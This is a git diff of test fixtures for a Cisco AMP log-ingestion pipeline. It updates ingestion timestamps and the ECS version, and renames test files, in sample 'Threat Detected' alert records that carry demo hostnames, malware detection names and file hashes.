@@ -2786,7 +2786,7 @@ }, "event": { "severity": 2, - "ingested": "2021-09-12T17:31:04.469670637Z", + "ingested": "2021-09-13T18:06:41.546145982Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6533669147354595000,\"timestamp\":1610705938,\"timestamp_nanoseconds\":360000000,\"date\":\"2021-01-15T10:18:58+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6533669147354595367\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Threat_Audit\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"63:5f:47:2b:89:91\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"ekjrngjker.exe\",\"file_path\":\"C:\\\\ekjrngjker.exe\",\"identity\":{\"sha256\":\"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967\",\"sha1\":\"b024546a49bad1bd60fccef0a5d11b55f9a442c4\",\"md5\":\"b99e0a8c56f963246b6464b9fffbf7a2\"}}}}", "kind": "alert", "action": "Threat Detected", @@ -2843,7 +2843,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "user": [ 
@@ -2871,7 +2871,7 @@ }, "event": { "severity": 2, - "ingested": "2021-09-12T17:31:04.469672538Z", + "ingested": "2021-09-13T18:06:41.546148086Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6533669143059628000,\"timestamp\":1610705937,\"timestamp_nanoseconds\":968000000,\"date\":\"2021-01-15T10:18:57+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6533669143059628070\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Threat_Audit\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"63:5f:47:2b:89:91\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"ekjrngjker.exe\",\"file_path\":\"C:\\\\ekjrngjker.exe\",\"identity\":{\"sha256\":\"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967\",\"sha1\":\"b024546a49bad1bd60fccef0a5d11b55f9a442c4\",\"md5\":\"b99e0a8c56f963246b6464b9fffbf7a2\"}}}}", "kind": "alert", "action": "Threat Detected", @@ -2928,7 +2928,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "hosts": [ 
@@ -2950,7 +2950,7 @@ }, "event": { "severity": 2, - "ingested": "2021-09-12T17:31:04.469674438Z", + "ingested": "2021-09-13T18:06:41.546150194Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6176259286289613000,\"timestamp\":1610705905,\"timestamp_nanoseconds\":669000000,\"date\":\"2021-01-15T10:18:25+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"GenericKD:Dyreza-tpd\",\"detection_id\":\"6176259286289612895\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Dyre\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"23:d5:92:eb:f8:9b\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"webinstall.exe\",\"file_path\":\"C:\\\\Users\\\\ADMINI~1\\\\AppData\\\\Local\\\\Temp\\\\webinstall.exe\",\"identity\":{\"sha256\":\"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc\",\"sha1\":\"ec80314ae4a2817be806b7ae27dbdb31a88226a0\",\"md5\":\"e9d8c15e7d18678dd41771f72ed6693c\"}}}}", "kind": "alert", "action": "Threat Detected", @@ -3007,7 +3007,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "hosts": [ 
@@ -3029,7 +3029,7 @@ }, "event": { "severity": 2, - "ingested": "2021-09-12T17:31:04.469676331Z", + "ingested": "2021-09-13T18:06:41.546152267Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6176259234750005000,\"timestamp\":1610705893,\"timestamp_nanoseconds\":657000000,\"date\":\"2021-01-15T10:18:13+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"GenericKD:Dyreza-tpd\",\"detection_id\":\"6176259234750005342\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Dyre\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"23:d5:92:eb:f8:9b\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"webinstall.exe\",\"file_path\":\"C:\\\\Users\\\\ADMINI~1\\\\AppData\\\\Local\\\\Temp\\\\webinstall.exe\",\"identity\":{\"sha256\":\"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc\",\"sha1\":\"ec80314ae4a2817be806b7ae27dbdb31a88226a0\",\"md5\":\"e9d8c15e7d18678dd41771f72ed6693c\"}}}}", "kind": "alert", "action": "Threat Detected", @@ -3086,7 +3086,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "hosts": [ 
@@ -3108,7 +3108,7 @@ }, "event": { "severity": 2, - "ingested": "2021-09-12T17:31:04.469678203Z", + "ingested": "2021-09-13T18:06:41.546154327Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6176259183210398000,\"timestamp\":1610705881,\"timestamp_nanoseconds\":645000000,\"date\":\"2021-01-15T10:18:01+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"GenericKD:Dyreza-tpd\",\"detection_id\":\"6176259183210397789\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Dyre\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"23:d5:92:eb:f8:9b\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"webinstall.exe\",\"file_path\":\"C:\\\\Users\\\\ADMINI~1\\\\AppData\\\\Local\\\\Temp\\\\webinstall.exe\",\"identity\":{\"sha256\":\"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc\",\"sha1\":\"ec80314ae4a2817be806b7ae27dbdb31a88226a0\",\"md5\":\"e9d8c15e7d18678dd41771f72ed6693c\"}}}}", "kind": "alert", "action": "Threat Detected", @@ -3174,7 +3174,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "user": [ 
@@ -3206,7 +3206,7 @@ }, "event": { "severity": 2, - "ingested": "2021-09-12T17:31:04.469680172Z", + "ingested": "2021-09-13T18:06:41.546156486Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6180335966167761000,\"timestamp\":1610705878,\"timestamp_nanoseconds\":875000000,\"date\":\"2021-01-15T10:17:58+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6180335966167760897\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Upatre\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"e1:e5:94:ea:a5:44\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"Fax.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\Administrator\\\\Documents\\\\Fax\\\\Fax.exe\",\"identity\":{\"sha256\":\"fa1789236d05d88dd10365660defd6ddc8a09fcddb3691812379438874390ddc\",\"sha1\":\"f9b02ad8d25157eebdb284631ff646316dc606d5\",\"md5\":\"b2e15a06b0cca8a926c94f8a8eae3d88\"},\"parent\":{\"process_id\":3164,\"disposition\":\"Clean\",\"file_name\":\"explorer.exe\",\"identity\":{\"sha256\":\"9e1ec8b43a88e68767fd8fed2f38e7984357b3f4186d0f907e62f8b6c9ff56ad\",\"sha1\":\"cea0890d4b99bae3f635a16dae71f69d137027b9\",\"md5\":\"8b88ebbb05a0e56b7dcc708498c02b3e\"}}}}}", "kind": "alert", "action": "Threat Detected", 
@@ -3267,7 +3267,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "user": [ @@ -3299,7 +3299,7 @@ }, "event": { "severity": 2, - "ingested": "2021-09-12T17:31:04.469682061Z", + "ingested": "2021-09-13T18:06:41.546158553Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6533668885361590000,\"timestamp\":1610705877,\"timestamp_nanoseconds\":672000000,\"date\":\"2021-01-15T10:17:57+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6533668885361590309\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Threat_Audit\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"63:5f:47:2b:89:91\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"ekjrngjker.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\ekjrngjker.exe\",\"identity\":{\"sha256\":\"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967\",\"sha1\":\"b024546a49bad1bd60fccef0a5d11b55f9a442c4\",\"md5\":\"b99e0a8c56f963246b6464b9fffbf7a2\"}}}}", "kind": "alert", "action": "Threat Detected", @@ -3356,7 +3356,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "user": [ 
@@ -3384,7 +3384,7 @@ }, "event": { "severity": 2, - "ingested": "2021-09-12T17:31:04.469683932Z", + "ingested": "2021-09-13T18:06:41.546160597Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6533668885361590000,\"timestamp\":1610705877,\"timestamp_nanoseconds\":653000000,\"date\":\"2021-01-15T10:17:57+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6533668885361590308\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Threat_Audit\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"63:5f:47:2b:89:91\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"ekjrngjker.exe\",\"file_path\":\"C:\\\\ekjrngjker.exe\",\"identity\":{\"sha256\":\"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967\",\"sha1\":\"b024546a49bad1bd60fccef0a5d11b55f9a442c4\",\"md5\":\"b99e0a8c56f963246b6464b9fffbf7a2\"}}}}", "kind": "alert", "action": "Threat Detected", @@ -3441,7 +3441,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "user": [ 
@@ -3469,7 +3469,7 @@ }, "event": { "severity": 2, - "ingested": "2021-09-12T17:31:04.469685813Z", + "ingested": "2021-09-13T18:06:41.546162684Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6533668885361590000,\"timestamp\":1610705877,\"timestamp_nanoseconds\":260000000,\"date\":\"2021-01-15T10:17:57+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.File.MalParent\",\"detection_id\":\"6533668885361590307\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_AMP_Threat_Audit\",\"external_ip\":\"8.8.8.8\",\"user\":\"user@testdomain.com\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"63:5f:47:2b:89:91\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"ekjrngjker.exe\",\"file_path\":\"C:\\\\ekjrngjker.exe\",\"identity\":{\"sha256\":\"b1380fd95bc5c0729738dcda2696aa0a7c6ee97a93d992931ce717a0df523967\",\"sha1\":\"b024546a49bad1bd60fccef0a5d11b55f9a442c4\",\"md5\":\"b99e0a8c56f963246b6464b9fffbf7a2\"}}}}", "kind": "alert", "action": "Threat Detected", @@ -3526,7 +3526,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "hosts": [ 
@@ -3548,7 +3548,7 @@ }, "event": { "severity": 2, - "ingested": "2021-09-12T17:31:04.469687673Z", + "ingested": "2021-09-13T18:06:41.546164735Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6176259135965757000,\"timestamp\":1610705870,\"timestamp_nanoseconds\":8000000,\"date\":\"2021-01-15T10:17:50+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"GenericKD:Dyreza-tpd\",\"detection_id\":\"6176259135965757532\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_Dyre\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"23:d5:92:eb:f8:9b\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"webinstall.exe\",\"file_path\":\"C:\\\\Users\\\\ADMINI~1\\\\AppData\\\\Local\\\\Temp\\\\webinstall.exe\",\"identity\":{\"sha256\":\"4fe85509bb6a87dbf04aa114c5523b183f995a6820f424871df29bca64ad7ecc\",\"sha1\":\"ec80314ae4a2817be806b7ae27dbdb31a88226a0\",\"md5\":\"e9d8c15e7d18678dd41771f72ed6693c\"}}}}", "kind": "alert", "action": "Threat Detected", @@ -3606,7 +3606,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "hosts": [ 
@@ -3626,7 +3626,7 @@ }, "event": { "severity": 3, - "ingested": "2021-09-12T17:31:04.469689561Z", + "ingested": "2021-09-13T18:06:41.546166865Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":1489955900291000600,\"timestamp\":1610705861,\"timestamp_nanoseconds\":291000000,\"date\":\"2021-01-15T10:17:41+00:00\",\"event_type\":\"Executed malware\",\"event_type_id\":1107296272,\"detection\":\"W32.3372C1EDAB-100.SBX.TG\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"High\",\"start_timestamp\":1610705861,\"start_date\":\"2021-01-15T10:17:41+00:00\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_TeslaCrypt\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"90:61:b5:c9:13:79\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"identity\":{\"sha256\":\"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370\"},\"parent\":{\"disposition\":\"Clean\",\"identity\":{\"sha256\":\"9e1ec8b43a88e68767fd8fed2f38e7984357b3f4186d0f907e62f8b6c9ff56ad\"}}}}}", "kind": "alert", "start": "2021-01-15T10:17:41.000Z", @@ -3686,7 +3686,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "hosts": [ 
@@ -3708,7 +3708,7 @@ }, "event": { "severity": 2, - "ingested": "2021-09-12T17:31:04.469691446Z", + "ingested": "2021-09-13T18:06:41.546168922Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6159251516445164000,\"timestamp\":1610705859,\"timestamp_nanoseconds\":613000000,\"date\":\"2021-01-15T10:17:39+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.DFC.MalParent\",\"detection_id\":\"6159251516445163601\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_TeslaCrypt\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"90:61:b5:c9:13:79\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"rjtsbks.exe\",\"file_path\":\"C:\\\\Users\\\\Administrator\\\\AppData\\\\Roaming\\\\rjtsbks.exe\",\"identity\":{\"sha256\":\"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370\",\"sha1\":\"e654d39cd13414b5151e8cf0d8f5b166dddd45cb\",\"md5\":\"209a288c68207d57e0ce6e60ebf60729\"}}}}", "kind": "alert", "action": "Threat Detected", @@ -3765,7 +3765,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "hosts": [ 
@@ -3791,7 +3791,7 @@ }, "event": { "severity": 2, - "ingested": "2021-09-12T17:31:04.469693323Z", + "ingested": "2021-09-13T18:06:41.546175169Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6159251516445164000,\"timestamp\":1610705859,\"timestamp_nanoseconds\":114000000,\"date\":\"2021-01-15T10:17:39+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.DFC.MalParent\",\"detection_id\":\"6159251516445163569\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_TeslaCrypt\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"90:61:b5:c9:13:79\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"rjtsbks.exe\",\"file_path\":\"\\\\\\\\?\\\\C:\\\\Users\\\\Administrator\\\\AppData\\\\Roaming\\\\rjtsbks.exe\",\"identity\":{\"sha256\":\"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370\",\"sha1\":\"e654d39cd13414b5151e8cf0d8f5b166dddd45cb\",\"md5\":\"209a288c68207d57e0ce6e60ebf60729\"}}}}", "kind": "alert", "action": "Threat Detected", 
diff --git a/packages/cisco_amp/data_stream/log/_dev/test/pipeline/cisco_amp3.ndjson.log b/packages/cisco_amp/data_stream/log/_dev/test/pipeline/test-cisco-amp3.log similarity index 100% rename from packages/cisco_amp/data_stream/log/_dev/test/pipeline/cisco_amp3.ndjson.log rename to packages/cisco_amp/data_stream/log/_dev/test/pipeline/test-cisco-amp3.log diff --git a/packages/cisco_amp/data_stream/log/_dev/test/pipeline/cisco_amp3.ndjson.log-expected.json b/packages/cisco_amp/data_stream/log/_dev/test/pipeline/test-cisco-amp3.log-expected.json similarity index 97% rename from packages/cisco_amp/data_stream/log/_dev/test/pipeline/cisco_amp3.ndjson.log-expected.json rename to packages/cisco_amp/data_stream/log/_dev/test/pipeline/test-cisco-amp3.log-expected.json index fb0cb6dbbed..bcf087a5dee 100644 --- a/packages/cisco_amp/data_stream/log/_dev/test/pipeline/cisco_amp3.ndjson.log-expected.json +++ b/packages/cisco_amp/data_stream/log/_dev/test/pipeline/test-cisco-amp3.log-expected.json @@ -12,7 +12,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "hosts": [ 
@@ -34,7 +34,7 @@ }, "event": { "severity": 2, - "ingested": "2021-09-12T17:31:17.581709368Z", + "ingested": "2021-09-13T18:06:53.271886158Z", "original": "{\"version\":\"v1.2.0\",\"metadata\":{\"links\":{\"self\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\",\"next\":\"https://api.eu.amp.cisco.com/v1/events?limit=500\u0026offset=500\"},\"results\":{\"total\":972,\"current_item_count\":500,\"index\":0,\"items_per_page\":500}},\"data\":{\"id\":6159251512150196000,\"timestamp\":1610705858,\"timestamp_nanoseconds\":381000000,\"date\":\"2021-01-15T10:17:38+00:00\",\"event_type\":\"Threat Detected\",\"event_type_id\":1090519054,\"detection\":\"W32.DFC.MalParent\",\"detection_id\":\"6159251512150196256\",\"connector_guid\":\"test_connector_guid\",\"group_guids\":[\"test_group_guid\"],\"severity\":\"Medium\",\"computer\":{\"connector_guid\":\"test_connector_guid\",\"hostname\":\"Demo_TeslaCrypt\",\"external_ip\":\"8.8.8.8\",\"active\":true,\"network_addresses\":[{\"ip\":\"10.10.10.10\",\"mac\":\"90:61:b5:c9:13:79\"}],\"links\":{\"computer\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer\",\"trajectory\":\"https://api.eu.amp.cisco.com/v1/computers/test_computer/trajectory\",\"group\":\"https://api.eu.amp.cisco.com/v1/groups/test_group\"}},\"file\":{\"disposition\":\"Malicious\",\"file_name\":\"rjtsbks.exe\",\"file_path\":\"C:\\\\Users\\\\Administrator\\\\AppData\\\\Roaming\\\\rjtsbks.exe\",\"identity\":{\"sha256\":\"3372c1edab46837f1e973164fa2d726c5c5e17bcb888828ccd7c4dfcc234a370\",\"sha1\":\"e654d39cd13414b5151e8cf0d8f5b166dddd45cb\",\"md5\":\"209a288c68207d57e0ce6e60ebf60729\"}}}}", "kind": "alert", "action": "Threat Detected", @@ -91,7 +91,7 @@ } }, "ecs": { - "version": "1.11.0" + "version": "1.12.0" }, "related": { "hosts": [ 
